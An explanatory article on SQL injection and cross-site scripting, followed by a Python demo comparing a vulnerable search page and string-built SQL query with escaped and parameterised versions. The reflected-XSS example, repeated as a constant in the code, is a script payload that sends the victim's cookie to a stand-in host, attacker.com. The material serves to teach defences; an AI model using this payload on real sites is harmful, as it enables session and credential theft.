SQL Injection and XSS Security Threats

SQL injection

A SQL injection attack happens when structured query language (SQL) code is injected into forms, cookies, or HTTP headers that do not use data sanitising or validation methods to verify the request. This flaw allows an attacker to extract, change, or delete data from databases that are connected to websites.

Cross-Site Scripting (XSS)

An XSS attack uses malicious code to redirect users to malicious websites, steal cookies or credentials, or deface websites. This is usually accomplished using malicious scripts that are executed in client browsers as a result of user input, functional statements, client requests, or other expressions.

There are two major types of cross-site scripting: Stored XSS and Reflected XSS.

Stored XSS

Stored XSS generally occurs when user input is stored on the target server, such as in a database, message forum, visitor log, or comment field, and a victim later retrieves the stored data from the web application without that data having been made safe to render in the browser.

Reflected XSS

Reflected XSS occurs when user input is immediately returned by a web application in an error message, search result, or any other response.

Consider this through an example:

  1. Suppose there is a search function in your application and the search URL looks like this: https://example.com/news?q=data+breach In the search results the website reflects the content of the query that the user searched for, such as: You searched for "data breach"
  2. If the search function is vulnerable to a reflected cross-site scripting vulnerability, the attacker can send the victim a link such as the one below:
https://example.com/news?q=<script>document.location='https://attacker.com/log.php?c=' + encodeURIComponent(document.cookie)</script>
  3. Once the victim clicks on the link, the website will display the following:
You searched for "<script>document.location='https://attacker.com/log.php?c=' + encodeURIComponent(document.cookie)</script>"

The HTML source code, which reflects the attacker's script unchanged, redirects the victim to a website that is controlled by the attacker, which can then record the user's current cookie for example.com as a GET parameter. To sum it up, the main difference between a SQL injection and an XSS attack is that SQL injection attacks are used to steal information from databases, whereas XSS attacks are mainly used to redirect users to websites where attackers can steal data from them.
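As an added example (not code from the original article), the following Python shows both halves of the comparison on the page's own search scenario: a results page that reflects the query verbatim beside one that HTML-escapes it, and a string-built SQL search beside a parameterised one. The news table and the hostnames are constructed for the demo; only the search string is the article's.

```python
import html
import sqlite3

# Constructed copy of the reflected-XSS search string from the article.
PAYLOAD = ("<script>document.location='https://attacker.com/log.php?c=' "
           "+ encodeURIComponent(document.cookie)</script>")


def render_results_unsafe(q: str) -> str:
    """Reflects the query verbatim, so the browser parses any tag inside it."""
    return f'<p>You searched for "{q}"</p>'


def render_results_safe(q: str) -> str:
    """Escapes <, >, &, and quotes so the query renders as text, not markup."""
    return f'<p>You searched for "{html.escape(q, quote=True)}"</p>'


def make_db() -> sqlite3.Connection:
    """Constructed in-memory news table used by the SQL half of the demo."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, published INTEGER)")
    conn.executemany("INSERT INTO news (title, published) VALUES (?, ?)",
                     [("Data breach at Example Corp", 1),
                      ("Unpublished draft: merger talks", 0)])
    return conn


def search_unsafe(conn: sqlite3.Connection, q: str) -> list:
    """String-built SQL: the user's text becomes part of the query grammar."""
    sql = f"SELECT title FROM news WHERE published = 1 AND title LIKE '%{q}%'"
    return [row[0] for row in conn.execute(sql)]


def search_safe(conn: sqlite3.Connection, q: str) -> list:
    """Parameterised SQL: q is bound as a value and cannot alter the statement."""
    sql = "SELECT title FROM news WHERE published = 1 AND title LIKE ?"
    return [row[0] for row in conn.execute(sql, (f"%{q}%",))]


def query_breaks(conn: sqlite3.Connection, q: str) -> bool:
    """True when the string-built query stops being valid SQL for this input."""
    try:
        search_unsafe(conn, q)
        return False
    except sqlite3.OperationalError:
        return True
```

The quotes in the article's search string are enough to make the string-built query fail to parse, which is the same defect that an injection exploits; the bound parameter treats them as ordinary characters.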
